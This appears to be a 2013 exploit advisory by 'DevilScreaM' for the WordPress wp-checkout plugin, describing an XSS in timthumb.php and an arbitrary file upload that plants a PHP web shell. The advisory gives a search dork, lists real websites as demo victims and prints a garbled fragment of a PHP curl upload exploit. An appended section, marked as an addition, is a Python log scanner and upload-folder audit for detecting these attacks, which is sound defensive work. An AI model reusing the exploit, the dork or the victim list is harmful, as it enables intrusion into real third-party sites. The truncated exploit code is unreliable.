#Title : Wordpress Plugin wp-checkout XSS / Arbitrary File Upload
#Author : DevilScreaM
#Date : 10/31/2013
#Category : Web Applications
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded
#Vulnerability : XSS, Arbitrary File Upload
#Dork : inurl:wp-content/plugins/wp-checkout

=================================================================================================
Cross Site Scripting
=================================================================================================

http://site-target/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[XSS]

Example :

http://osteopathywinchester.co.uk/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=
DevilScreaM

http://pacificcrest.org/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=
DevilScreaM

Solution : upgrade TimThumb to the current version, or delete the bundled timthumb.php file.

=================================================================================================
Arbitrary File Upload
=================================================================================================

Exploit :

http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php

    "@$uploadfile", 'folder'=>'/wp-content/uploads/wp-checkout/'));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>

Shell Access :

http://site-target/wp-content/uploads/wp-checkout/devilscream.php

Demo :

http://prittybypri.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://windham73.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://twobuttons.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://riosdeaguavivaupci.com/hp_wordpress/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://brookesprevention.org/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://theheartofawoman.net/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
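The following is an added defensive example and is not part of DevilScreaM's advisory or of the wp-checkout plugin. It covers both issues from a site owner's side: a scanner over access-log lines that flags requests to the plugin's bundled timthumb.php whose src is not a plain image URL, POSTs to vendors/ajaxupload/upload.php, and requests for .php files under wp-content/uploads/wp-checkout/ (the location the advisory names for an uploaded script); plus a filesystem audit that lists any PHP file below wp-content/uploads, which should only ever hold media. It assumes Apache/nginx "combined" log format; the plugin paths are taken from the advisory, and the sample log lines and directory fixture are constructed for the demo, not real traffic or a real site.

```python
"""Added defensive helper (not part of the advisory or of the wp-checkout plugin).

  * scan():  walks access-log lines in Apache/nginx "combined" format and flags
             (a) timthumb.php requests whose src is not a plain image URL,
             (b) POSTs to vendors/ajaxupload/upload.php, and
             (c) requests for .php files under wp-content/uploads/wp-checkout/.
  * find_php_under_uploads():  lists PHP files below wp-content/uploads.
Sample log lines and the directory fixture are constructed for this example.
"""
import os
import re
import tempfile
from urllib.parse import parse_qs, urlsplit

# Assumed log format: combined (ip ident user [ts] "METHOD path proto" status size ...).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Plugin paths as given in the advisory.
TIMTHUMB_RE = re.compile(r'/wp-content/plugins/wp-checkout/vendors/timthumb\.php$')
UPLOAD_RE = re.compile(r'/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload\.php$')
UPLOADED_PHP_RE = re.compile(r'/wp-content/uploads/wp-checkout/.*\.php\d?$', re.IGNORECASE)
# What a legitimate timthumb src looks like: an http(s) URL ending in an image extension.
IMAGE_SRC_RE = re.compile(r'^https?://[\w./-]+\.(?:jpe?g|png|gif)$', re.IGNORECASE)


def classify(line):
    """Return a list of (indicator, detail) tuples for one log line; [] if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return [("unparsed", line.strip())]
    url = urlsplit(m.group("path"))
    findings = []
    if TIMTHUMB_RE.search(url.path):
        src = parse_qs(url.query).get("src", [""])[0]  # parse_qs already percent-decodes
        if not IMAGE_SRC_RE.match(src):
            findings.append(("timthumb_src_not_image", src))
    if m.group("method") == "POST" and UPLOAD_RE.search(url.path):
        findings.append(("ajaxupload_post", url.path))
    if UPLOADED_PHP_RE.search(url.path):
        findings.append(("php_under_uploads", url.path))
    return findings


def scan(lines):
    """Group indicators by client IP: {ip: [(indicator, detail), ...]}."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        ip = m.group("ip") if m else "?"
        for finding in classify(line):
            hits.setdefault(ip, []).append(finding)
    return hits


def find_php_under_uploads(wp_root):
    """Paths (relative to wp_root) of PHP files below wp-content/uploads."""
    uploads = os.path.join(wp_root, "wp-content", "uploads")
    found = []
    for dirpath, _, files in os.walk(uploads):
        for name in files:
            if re.search(r"\.php\d?$", name, re.IGNORECASE):
                found.append(os.path.relpath(os.path.join(dirpath, name), wp_root))
    return sorted(found)


def build_fixture():
    """Constructed directory tree for the demo (not a real site)."""
    root = tempfile.mkdtemp()
    for rel in ("wp-content/uploads/wp-checkout/devilscream.php",
                "wp-content/uploads/2013/10/photo.png",
                "wp-content/plugins/wp-checkout/vendors/timthumb.php"):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "w").close()
    return root


# Constructed sample log lines (RFC 5737 documentation addresses, not real clients).
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Oct/2013:10:00:01 +0000] "GET /wp-content/plugins/wp-checkout/vendors/timthumb.php?src=http://example.com/a.jpg&w=100 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [31/Oct/2013:10:00:02 +0000] "GET /wp-content/plugins/wp-checkout/vendors/timthumb.php?src=%3Cb%3EDevilScreaM%3C/b%3E HTTP/1.1" 400 211',
    '198.51.100.7 - - [31/Oct/2013:10:00:03 +0000] "POST /wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php HTTP/1.1" 200 45',
    '198.51.100.7 - - [31/Oct/2013:10:00:04 +0000] "GET /wp-content/uploads/wp-checkout/devilscream.php HTTP/1.1" 200 1024',
    '198.51.100.2 - - [31/Oct/2013:10:00:05 +0000] "GET /wp-content/uploads/2013/10/photo.png HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG).items():
        for indicator, detail in findings:
            print(f"{ip}\t{indicator}\t{detail}")
    print("PHP under uploads:", find_php_under_uploads(build_fixture()))
```

A POST to upload.php followed shortly by a GET of a .php file under uploads/wp-checkout/ from the same client is the sequence to treat as a confirmed compromise rather than a probe; the filesystem audit is the quickest way to confirm whether anything actually landed, and it stays useful after the plugin has been removed.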